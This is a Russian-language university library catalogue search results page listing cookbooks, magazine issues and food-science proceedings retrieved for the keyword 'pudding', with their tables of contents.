Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

124 пользователей


Зарегистрированных: 4 

Борисенко Виктория Александровна

Лисина Марина Михайловна

Асташков Владимир Анатольевич

Медведева Юлия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПУДИНГ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Постный стол [Текст] / ред., сост. Т. А. Ружинская, дар. А. В. Мышлявцев, 1999. - 345 с.
Держатели документа (Информация об экземплярах) 
2. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. М. Т. Лабзина, 2014. - 767, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
5. 
Питание и общество. - Журнал, 2010г. № 12
Оглавление 
  • Абрикосовый пудинг. - с.5
  • Варенье из апельсинов. - с.5
  • Натуральные органик-продукты. - с.8-9
  • Кучер, Л. Искусство ведения переговоров / Л. Кучер, Л. Шкуратова. - с.14-15
  • Сальков, Петр. Кабан в луковом соусе по-охотничьи / П. Сальков. - с.15
  • Забнев, Сергей. Кофе по-американски / С. Забнев. - с.16
  • Кашев, Анатолий Александрович. Русский салат с иностранным именем / А. А. Кашев. - с.17
  • Сучкова, Елена. "Карамельный кот" / Е. Сучкова. - с.18-19
  • Суворов, Роман. "Хрустящий батискаф для подводной братвы" / Р. Суворов. - с.20
  • Филонов, Михаил. "Суп - это улыбка хозяйки" / М. Филонов. - с.20-21
  • Самойлов, Юрий. Приготовила Айсият Койтемирова / Ю. Самойлов. - с.22-23
  • Арефьева, Елена. Печем румяные, ароматные пирожки, как у бабушки / Е. Арефьева. - с.24
  • Арефьева, Анастасия. Десерт по-японски / А. Арефьева. - с.25
  • Амирасланов, Тахир. Дастан о пастушьей басдырме / Т. Амирасланов. - с.26-28
  • Арефьева, Елена. Сказ о пельмене / Е. Арефьева, А. Арефьева. - с.28-29
  • Арефьева, Анастасия. Иссоп обыкновенный / А. Арефьева. - с.30
  • Поросенок, жаренный на вертеле
6. 
Наука и жизнь. - Журнал, 2011г. № 9
Оглавление 
  • [Новости иностранной науки и техники]. - с.32-35
  • Наука и жизнь в начале XX века. - с.60
  • [Новости отечественной науки и техники]. - с.66-67
  • [Научно-популярные журналы мира сообщают]. - с.79-81
  • Суперанская, Александра. [Происхождение фамилий] / А. Суперанская. - с.98-99
  • Гик, Евгений. Каковы правила, таковы и шахматы / Е. Гик. - с.129-132
  • Горькавый, Николай. Сказка об авиаторе Сикорском, мечтавшем летать медленно / Н. Горькавый. - с.90-94
  • [Интересные факты и цифры из жизни общества]. - с.112-113
  • Белоконева, Ольга. На пути к ветру и солнцу / О. Белоконева. - с.2-6
  • Гудкова, Тамара. Планеты на ленте сейсмометра / Т. Гудкова. - с.7-11
  • Белоцерковская, Вероника. Таганрогский залив теряет морских обитателей / В. Белоцерковская. - с.12-13
  • Смирнов, Сергей. Новые покрытия для новых ракет / С. Смирнов. - с.13-14
  • Зимина, Татьяна. Топливные элементы на глюкозе / Т. Зимина. - с.14
  • Никифоров, Михаил. Россия возвращается в Европейскую обсерваторию в Чили / М. Никифоров. - с.15
  • Быков, Виктор Александрович. Наука не делится на "свою" и "чужую" / В. А. Быков. - с.16-24
  • Андреюк, Денис. Микроскопия от "увидеть" до "потрогать" / Д. Андреюк, Е. Вешняковская. - с.24-30
  • Тархов, Тимур. Российская интеллигенция: тени забытых предков / Т. Тархов. - с.36-43
  • Фролов, Юрий. Программа "Медуза" / Ю. Фролов. - с.44-45
  • Ильин, Александр. После шаттла / А. Ильин. - с.46-48
  • Боков, Виктор. Когда содрогнется Земля? Краткосрочные прогнозы землетрясений / В. Боков. - с.49-59
  • Смирнов, Сергей. Врата Спаса на Крови / С. Смирнов. - с.61-64
  • Где находится полюс жары?. - с.65
  • Иоффе, Генрих. Корниловская эпопея, или Выстрел на Захарьевской, 19 / Г. Иоффе. - с.68-78
  • Белоконева, Ольга. Новые технологии на конкурсе "Новое поколение - 2011" / О. Белоконева. - с.82-84
  • Василенко, Наталья. Вслед за ветром на крылатке / Н. Василенко. - с.85-89
  • Транковский, Сергей. О чем малиновка поет, или О пользе буквы Е / С. Транковский. - с.89
  • Филатова, Елена. Возвращение мартинички / Е. Филатова. - с.96-97
  • Руденко, Борис. Велосипед: назад - в будущее! / Б. Руденко. - с.100-106
  • Прытков, Вячеслав. Велосипеды - моя давняя страсть / В. Прытков. - с.106-107
  • Замятина, Наталья. Мир растительных запахов / Н. Замятина, И. Сокольский. - с.108-111
  • Девятова, Елена. Записки помещика / Е. Девятова. - с.114-120
  • Яковлева, Татьяна. Усадьба Авчурино: вышивка крестом / Т. Яковлева. - с.121-123
  • Хейфец, Эдуард. Гиганты луж / Э. Хейфец. - с.124-125
  • Епатко, Андрей. Шаровая молния в Летнем дворце Петра Великого / А. Епатко. - с.126-128
  • Ситников, Константин. Марс жесток? / К. Ситников. - с.136-140
  • Гик, Евгений. Головоломки из фольклора / Е. Гик. - с.142
  • Сокольский, Игорь. Пудинг Кисельвроде / И. Сокольский. - с.143-144
  • Современный рецепт пудинга. - с.144, 3-я с. обл.
7. 
Крестьянка. - Журнал, 2011г. № 5
Оглавление 
  • [Письма читателей]. - с.2
  • аль-Шимари, Елена. 5 самых модных растений этого лета / Е. аль-Шимари. - с.8
  • Чтобы помнили. - с.10-17
  • Пересильд, Юлия. Без остановок / Ю. Пересильд. - с.18-23
  • Можаева, Екатерина. Нарисованное счастье / Е. Можаева. - с.26-27
  • Прокофьева, Елена. Маменькин сынок / Е. Прокофьева. - с.28-30
  • Чистова, Анна. Что вы плетете? / А. Чистова. - с.31
  • Санжарова, Оксана. Вишневый сад / О. Санжарова. - с.32-34
  • Лето в полосочку. - с.35
  • Санжарова, Оксана. Игра со словом / О. Санжарова. - с.36-37
  • Волох, Александра. Все по уставу / А. Волох. - с.38-39
  • Ямлиханова, Рената. Время кукситься / Р. Ямлиханова. - с.42-43
  • Ситтель, Мария. Машина каша / М. Ситтель. - с.44-45
  • Тарелкина, Катя. Картина маслом / К. Тарелкина. - с.46-47
  • Съесть и похудеть. - с.48-49
  • Новиков, Илья. Завтрак, который всегда с тобой / И. Новиков. - с.50-51
  • Денисова, Елена. Меню на траве / Е. Денисова. - с.52-53
  • Людковская, Анна. Пудинг, мэм / А. Людковская. - с.54-55
  • Людковская, Анна. Огненные дни / А. Людковская. - с.56-57
  • Гречишкина, Ольга. Мусс для мисс / О. Гречишкина. - с.58
  • Козлова, Анна. На измене / А. Козлова. - с.60-61
  • Калинина-Артемова, Анна. Теория и (или) практика / А. Калинина-Артемова. - с.62-63
  • Куценко, Гоша. Любовь - это боль / Г. Куценко. - с.64-65
  • Парфенов, Леонид. Настроение эпохи / Л. Парфенов. - с.66-67
  • Синицына, Зоя. Гости из прошлого / З. Синицына. - с.68-69
  • Дени, Александр. С тобой и без тебя / А. Дени. - с.70-73
  • Гусева, Ольга. Прогулки на бумаге / О. Гусева. - с.74
  • Расплескалась синева. - с.76-77
  • Можаева, Екатерина. Наука сна / Е. Можаева. - с.78-80
  • Рожко, Дарья. Аллергия на весну / Д. Рожко. - с.82-83
  • [Здоровье]. - с.84
  • Столяров, Юрий. Метаморфозы / Ю. Столяров. - с.87
  • Рожко, Дарья. Открытый сезон / Д. Рожко. - с.88-89
  • 15 сладких леденцов. - с.87
  • Чистова, Анна. Приключения итальянца в России / А. Чистова. - с.92-93
  • Забористая история. - с.94-95
  • аль-Шимари, Елена. Откуда корни растут / Е. аль-Шимари. - с.98-99
  • Алексеева, Ксения. Грибное место / К. Алексеева. - с.100-101
  • Можаева, Екатерина. Гляжусь в тебя, как в зеркало / Е. Можаева. - с.102-104
  • Новоселова, Марина. Море и мирт / М. Новоселова. - с.106-108
  • [Фотоконкурс]. - с.110-111
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2009г. № 10
Оглавление 
  • Рязанова, О. А. Формирование российского рынка сои и соевых продуктов / О. А. Рязанова, О. Д. Кириличева, В. А. Шестобитов. - с.8-10
    Кл. слова: СОЯ, РЫНОК ПОТРЕБИТЕЛЬСКИЙ
  • Кучеренко, Л. А. Направления рационального использования сои / Л. А. Кучеренко, В. С. Петибская, Е. Г. Ившина. - с.11-13
  • Использование нетрадиционных источников белка растительного происхождения. - с.14-15
    Кл. слова: БЕЛОК - ПИТАНИЕ
  • Новые виды мясорастительных полуфабрикатов на основе злаковых культур. - с.16-17
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСОРАСТИТЕЛЬНЫЕ
  • Шилов, Г. Ю. ХАССП - вершина пирамиды пищевой безопасности / Г. Ю. Шилов, И. Н. Лейнсон. - с.18-19
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ
  • Максимов, А. Д. Плодоовощная индустрия на выставках FRUIT LOGISTICA и FRESHCONEX в Берлине / А. Д. Максимов. - с.20-21
    Кл. слова: ВЫСТАВКА, FRUIT LOGISTICA, FRESHCONEX
  • Обухов, Е. Б. Разработка алгоритмов программ при компьютерном моделировании экологизированных производств пищевых продуктов / Е. Б. Обухов, А. А. Мисаковский, Е. А. Воронова. - с.24-26
    Кл. слова: ПРОИЗВОДСТВО экологизированное, ПРОДУКТЫ ПИЩЕВЫЕ, МОДЕЛИРОВАНИЕ КОМПЬЮТЕРНОЕ
  • Киселева, Т. Ф. Желейные заливки на основе овощных соков / Т. Ф. Киселева, О. Ю. Аксенова, И. В. Мозжерина. - с.28-30
    Кл. слова: ЗАЛИВКА желейная, СОК овощной
  • Здоровые продукты Алтайского края. - с.31
    Кл. слова: МЕД АЛТАЙСКИЙ, СЫР АЛТАЙСКИЙ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Специализированные продукты питания с использованием растительных антиоксидантов. - с.32-33
    Кл. слова: АНТИОКСИДАНТ, дигидрокверцетин
  • Тыщенко, Е. А. Исследование рынка биологически активных добавок / Е. А. Тыщенко, Г. А. Гореликова, Л. А. Яковлева. - с.34-35
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА, ИССЛЕДОВАНИЕ РЫНКА
  • Трунов, В. А. Оборудование по формированию и упаковке грузов на предприятиях ликероводочной, винодельческой и пивобезалкогольной промышленности / В. А. Трунов. - с.48-51
    Кл. слова: УПАКОВКА КАРТОННАЯ, ОБОРУДОВАНИЕ УПАКОВОЧНОЕ
  • Евдокимова, О. В. Новые виды творожных продуктов - пудинги обогащенные / О. В. Евдокимова, Г. М. Зомитева. - с.60-62
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ПУДИНГ
  • Сырокопченые мясопродукты, обогащенные биологически активными ингредиентами. - с.64-65
    Кл. слова: МЯСОПРОДУКТЫ сырокопченые
  • Иринина, О. И. Оптимизация биологической ценности комбинированных рыборастительных кулинарных изделий / О. И. Иринина, А. А. Смоленцева. - с.66-67
    Кл. слова: ЦЕННОСТЬ ПИЩИ БИОЛОГИЧЕСКАЯ
  • Токаев, Э. С. Специализированные белковоуглеводные продукты питания для спортсменов / Э. С. Токаев, И. А. Бастриков. - с.70-72
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
9. 
Вокруг света. - Журнал, 2005г. № 3
Оглавление 
  • Хранители дождя. - с.8-16
  • Шаг в бездну. - с.28-39
  • Что англичане подают "на пудинг"?. - с.40
  • Антиулица: один день на Большом канале. - с.54-73
  • Красный дубль Ferrari. - с.74-75
  • От двери до двери. - с.76
  • Великая тайна жизни. - с.78-91
  • Герат - снаружи и изнутри. - с.92-105
  • Беззащитные привидения. - с.108-118
  • Цусимский разгром. - с.120-129
  • Мост длиною в 100 лет. - с.130
  • Артиллерийские инновации русско-японской войны по "артиллерийскому ведомству". - с.131
  • Коллекции великих тиранов. - с.132-141
  • Как попасть в мир музыки?. - с.146
  • Еще не звери, уже не гады. - с.152-160
  • Репортаж очевидцев из Бразилии. - с.162-165
  • "Истинная повесть" графини Ростопчиной. - с.166-174
  • В стране красных каньонов. - с.178-187
  • Уэленские фантазии. - с.196-203
  • Курорт для мегаполиса. - с.208-213
Держатели документа (Информация об экземплярах) 
10. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
11. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
12. 
Актуальные проблемы современных наук: теория и практика [Текст] / ред. А. И. Барановский, 2013. - 368 с.
Оглавление 
  • Агеева, А. В. Конституционно-правовой статус семьи в Российской Федерации / А. В. Агеева. - с.6-40
    Кл. слова: СЕМЬЯ - ПРАВО
  • Гольм, А. А. Налоговая ответственность организации в Российской Федерации / А. А. Гольм. - с.41-84
    Кл. слова: ОТВЕТСТВЕННОСТЬ НАЛОГОВАЯ
  • Есипова, М. С. Разработка творожного пудинга для питания детей школьного возраста Омского региона / М. С. Есипова. - с.85-104
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Добровольский, С. А. Некоторые правовые аспекты выборов Президента РФ / С. А. Добровольский. - с.105-136
    Кл. слова: ВЫБОРЫ ПРЕЗИДЕНТА, ПРЕЗИДЕНТ РФ
  • Журавлева, И. А. Некоторые аспекты правового регулирования конкуренции в современном законодательстве РФ / И. А. Журавлева. - с.137-161
    Кл. слова: РЕГУЛИРОВАНИЕ ПРАВОВОЕ, КОНКУРЕНЦИЯ - ПРАВО
  • Завгородняя, Л. М. Исследование и разработка технологии молочного десерта для питания школьников / Л. М. Завгородняя. - с.162-173
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Запащикова, Ю. И. Основные направления денежно-кредитной политики / Ю. И. Запащикова. - с.174-199
    Кл. слова: ПОЛИТИКА ДЕНЕЖНО-КРЕДИТНАЯ
  • Мозжерина, М. А. Влияние ЭМП СВЧ на структурно-функциональное состояние белков в составе пищевого сырья и продуктов питания / М. А. Мозжерина. - с.200-214
    Кл. слова: СВЧ, БЕЛОК - ПИТАНИЕ
  • Христинина, Е. В.. Дискуссионные вопросы института Президента РФ / Е. В. Христинина. - с.214-259
    Кл. слова: ДИСКУССИЯ, ИНСТИТУТ ПРЕЗИДЕНТА РФ
  • Панкова, А. А. Особенности формирования трудового потенциала предприятия в современных условиях / А. А. Панкова, К. С. Коробова. - с.259-291
    Кл. слова: ПОТЕНЦИАЛ ТРУДОВОЙ
  • Шангина, О. А. Правовое регулирование конкуренции в современном предпринимательском праве России / О. А. Шангина. - с.292-326
    Кл. слова: ПРАВО ПРЕДПРИНИМАТЕЛЬСКОЕ, КОНКУРЕНЦИЯ - ПРАВО, РЕГУЛИРОВАНИЕ ПРАВОВОЕ
  • Шевелева, Л. А. Изучение социальных аспектов возникновения никотиновой зависимости среди молодежи / Л. А. Шевелева. - с.327-344
    Кл. слова: НИКОТИН, КУРЕНИЕ, ЗАВИСИМОСТЬ НИКОТИНОВАЯ
  • Юхименко, А. В. Особенности кадровой политики в современной организации / А. В. Юхименко. - с.345-368
    Кл. слова: ПОЛИТИКА КАДРОВАЯ
Держатели документа (Информация об экземплярах) 
13. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 1 [Текст] / ред. А. И. Барановский, 2012. - 174 с.
Ключевые слова 
Оглавление 
  • Авраменко, К. О. Формат «Free Flow» как инновационное направление в предприятиях индустрии питания / К. О. Авраменко, Н. В. Бураковская. - с.6-7
    Кл. слова: FREE FLOW
  • Агеева, Е. А. Современное состояние и направления развития общественного питания в г. Магнитогорске / Е. А. Агеева, И. А. Долматова. - с.7-12
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ
  • Деменконя, Е. М. Школьное питание как фактор развития здорового поколения / Е. М. Деменконя, М.А. Гриценко. - с.13-16
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Дризнер, Р. А. Современное состояние отрасли общественною питания в г. Екатеринбурге, проблемы кадров, трудоустройства и пути решения / Р. А. Дризнер. - с.16-21
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ
  • Есина, А. Н. Соответствие испытательной лаборатории "Сертификат" критериям аккредитации / А. Н. Есина. - с.21-25
  • Каня, И. П. Бинарные занятия как средство формирования экспериментальных навыков (из опыта преподавания на технологическом факультете ОмЭИ) / И. П. Каня, О. Ю. Мельникова, А. Н. Королев. - с.25-28
    Кл. слова: ЗАНЯТИЕ БИНАРНОЕ
  • Ковальчук, А. В. Анализ рынка оборудования предприятий питания в России / А. В. Ковальчук, М. А. Шадрин. - с.28-34
    Кл. слова: ОБОРУДОВАНИЕ ПРЕДПРИЯТИЯ ОБЩЕСТВЕННОГО ПИТАНИЯ, РЫНОК ОБОРУДОВАНИЯ ПРЕДПРИЯТИЙ ПИТАНИЯ
  • Конищева, Е. А. Контроль качества меда / Е. А. Конищева, Е. П. Галкова. - с.31-34
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА МЕДА, МЕД
  • Котова, Т. И. Современные тенденции развития рынка предприятии общественного питания г. Магнитогорска / Т. И. Котова, И. А. Долматова, В. Ф. Рябова. - с.34-41
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Кузьменко, С. П. Реализация системы управления качеством продукции в Сибирском регионе / С. П. Кузьменко, М. А. Тарасова, М. А. Шадрин. - с.41-43
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦИИ, СИБИРЬ
  • Кусаинова, Д. А. Гастрономические особенности китайской кухни / Д. А. Кусаинова. - с.44-45
    Кл. слова: КУХНЯ КИТАЙСКАЯ
  • Мустакова, М. М. О необходимости внедрения современных систем менеджмента на предприятия пищевой перерабатывающей промышленности стран таможенного союза / М. М. Мустакова. - с.46-49
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ, СОЮЗ ТАМОЖЕННЫЙ, МЕНЕДЖМЕНТ
  • Пестова, П. А. Личность в социальной системе управления сферы услуг / П. А. Пестова. - с.49-54
    Кл. слова: СФЕРА УСЛУГ
  • Плаксина, Н. Н. Изучение аминокислотного состава блюд студенческих столовых / Н. Н. Плаксина, Н. И. Барышникова. - с.54-57
    Кл. слова: АМИНОКИСЛОТА, СТОЛОВАЯ СТУДЕНЧЕСКАЯ
  • Платова, А. В. Применение кейтеринга в Омском регионе на примере банкетного зала "Анна" / А. В. Платова, М. С. Мальцева, М. А. Шадрин. - с.57-59
    Кл. слова: КЕЙТЕРИНГ
  • Репин, М. Н. Характеристика рынка торгового оборудования Омского региона / М. Н. Репин, М. А. Шадрин. - с.59-62
    Кл. слова: ОБОРУДОВАНИЕ ТОРГОВОЕ, ОМСКАЯ ОБЛАСТЬ
  • Рождественская, Л. Н. Целеполагание в системе управления качеством услуг социального питания / Л. Н. Рождественская. - с.62-71
    Кл. слова: ПИТАНИЕ СОЦИАЛЬНОЕ, УПРАВЛЕНИЕ КАЧЕСТВОМ ПИТАНИЯ, КАЧЕСТВО ПИТАНИЯ
  • Седельникова, Д. С. Организация и технология диетического питания в гостиничных комплексах / Д. С. Седельникова. - с.72-74
    Кл. слова: ПИТАНИЕ ДИЕТИЧЕСКОЕ, ГОСТИНИЦА - ПИТАНИЕ
  • Турлубаева, А. Н. Обеспечение качества и безопасности пищевых продуктов / А. Н. Турлубаева, С. В. Стадникова. - с.74-78
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Хлононских, Н. А. Особенности обслуживания тематических мероприятий / Н. А. Хлононских. - с.78-81
    Кл. слова: ОБСЛУЖИВАНИЕ МЕРОПРИЯТИЙ
  • Янушкевич, К. А. Роль международных стандартов в обеспечении качества и безопасности пищевых продуктов / К. А. Янушкевич, Н. А. Смирнова. - с.81-84
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Алексеева, Г. В. Способы повышения качества кондитерских изделий на жировой основе / Г. В. Алексеева, И. А. Ивкова. - с.86-90
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, ВАФЛИ
  • Аникина, Е. Н. Актуальность разработки молочно-злаковых продуктов / Е. Н. Аникина. - с.91-94
    Кл. слова: ПРОДУКТЫ МОЛОЧНО-ЗЛАКОВЫЕ
  • Аникина, Е. Н. Перспективы использования пребиотиков в производстве ферментированных молочных продуктов / Е. Н. Аникина, О. В. Пасько. - с.94-98
    Кл. слова: ПРЕБИОТИКИ
  • Аралбаева, Г. Д. Индустриальные технологии в производстве молочных продуктов на примере ООО «Молочный завод "Лузинский" / Г. Д. Аралбаева, А. Б. Лобкова. - с.98-101
    Кл. слова: МОЛОКО, ЗАВОД МОЛОЧНЫЙ ЛУЗИНСКИЙ
  • Банадысева, И. Д. Особенности формирования потребительского восприятия инноваций в общественном питании / И. Д. Банадысева, Л. Н. Рождественская. - с.98-101
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - ИННОВАЦИИ, ВОСПРИЯТИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Беспалова, Т. А. Гармонизации стандартов продуктов питания / Т. А. Беспалова, О. А. Приступа. - с.107-113
    Кл. слова: СТАНДАРТЫ ПРОДУКТОВ ПИТАНИЯ
  • Васильева, В. Э. Функциональный наполнитель в хлебопечении / В. Э. Васильева. - с.113-116
    Кл. слова: ХЛЕБ, НАПОЛНИТЕЛИ ХЛЕБА
  • Вилемсон, Е. М. Разработка мороженого с пробиотическими свойствами / Е. М. Вилемсон, О. В. Пасько. - с.116-120
    Кл. слова: МОРОЖЕНОЕ
  • Воронкова, М. Н. Зависимость показателей качества хлеба пшеничного от показателей качества зерна пшеницы / М. Н. Воронкова. - с.120-125
    Кл. слова: КАЧЕСТВО ХЛЕБА, КАЧЕСТВО ЗЕРНА, ХЛЕБ
  • Воронова, Е. А. Производство функциональных продуктов на предприятии ООО "Сибирский молочный комбинат" / Е. А. Воронова, Н. И. Захарчснко, А. Г. Анацкая. - с.125-131
    Кл. слова: БИФИДИН
  • Вотинцев, Ю. П. Производство творожных продуктов методом ультрафильтрации / Ю. П. Вотинцев. - с.132-134
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, МЕТОД УЛЬТРАФИЛЬТРАЦИИ
  • Выставной, И. А. Изучение процесса ферментации сливочной основы ассоциациями микроорганизмов / И. А. Выставной. - с.134-140
    Кл. слова: ФЕРМЕНТАЦИЯ, МИКРООРГАНИЗМ
  • Гаврилова, Ю. А. Использование зимологических индикаторов при контроле качества пищевой продукции микробиологическими методами / Ю. А. Гаврилова. - с.141-144
    Кл. слова: ИНДИКАТОР ЗИМОЛОГИЧЕСКИЙ
  • Гатауллина, Ю. Р. Батончики мюсли повышенной биологической ценности на соево-злаковой основе / Ю. Р. Гатауллина. - с.144-147
    Кл. слова: МЮСЛИ, БАТОНЧИКИ МЮСЛИ
  • Герунов, Т. В. Пестициды - потенциальная угроза качеству продуктов питания / Т. В. Герунов, А. П. Козлов, А. В. Леушин. - с.147-150
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПЕСТИЦИДЫ
  • Гончарова, Т. С. Современные способы повышения качества пищевых продуктов / Т. С. Гончарова. - с.150-153
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Дудко, В. В. Современные индустриальные технологии пищевых продуктов / В. В. Дудко, В. А. Кузнецова. - с.153-156
    Кл. слова: ТЕХНОЛОГИЯ ПИЩЕВЫХ ПРОИЗВОДСТВ, ПРОИЗВОДСТВО ПИЩЕВОЕ
  • К вопросу о создании обогащенных продуктов питания / ; Ю. В. Евпатченко, [и др.]. - с.156-160
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ ОБОГАЩЕННЫЕ
  • Оценка безопасности продуктов питания посредством показателя активности воды / ; Ю. В. Евпатченко, [и др.]. - с.160-164
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ
  • Есипова, М. С. Разработка новых рецептур пудинга творожного с плодово-ягодными наполнителями для питания школьников / М. С. Есипова. - с.164-168
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Ефремова, О. М. Отруби как функциональная добавка в хлебобулочных изделиях / О. М. Ефремова. - с.169-171
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
Держатели документа (Информация об экземплярах) 
14. 
Научный потенциал молодежи: состояние, проблемы, перспективы исследований [Текст] : сб. лучших студенческих работ по итогам IX внутривузовского конкурса на лучшую науч.-исслед. работу студентов за 2011/12 учеб. год. Т. 1 / АНО ВПО "Омский экономический ин-т", 2012. - 226 с.
Ключевые слова 
Оглавление 
  • Гнатюк, О. Н. Патриотизм и историческое самосознание студенческой молодежи / О. Н. Гнатюк. - с.8-30
    Кл. слова: САМОСОЗНАНИЕ МОЛОДЕЖИ
  • Добровольский, С. В. Некоторые правовые аспекты выборов Президента РФ / С. В. Добровольский. - с.31-63
    Кл. слова: ВЫБОРЫ ПРЕЗИДЕНТА, ПРЕЗИДЕНТ РФ
  • Есипова, М. С. Разработка творожного пудинга для питания детей школьного возраста Омского региона / М. С. Есипова. - с.64-83
    Кл. слова: ПУДИНГ, ПИТАНИЕ ШКОЛЬНИКОВ, ОМСКАЯ ОБЛАСТЬ
  • Кайгородцева, А. А. Математические понятия и термины: история возникновения и применение в других науках / А. А. Кайгородцева. - с.84-105
    Кл. слова: ТЕРМИН МАТЕМАТИЧЕСКИЙ
  • Каргалова, Е. С. Оценка качества трудовой жизни персонала ПО "Полет" - филиала ФГУП "ГКНПЦ им. М. В. Хруничева" г. Омска / Е. С. Каргалова. - с.106-131
    Кл. слова: ОБЪЕДИНЕНИЕ ПРОИЗВОДСТВЕННОЕ, ПОЛЕТ, КАЧЕСТВО ЖИЗНИ
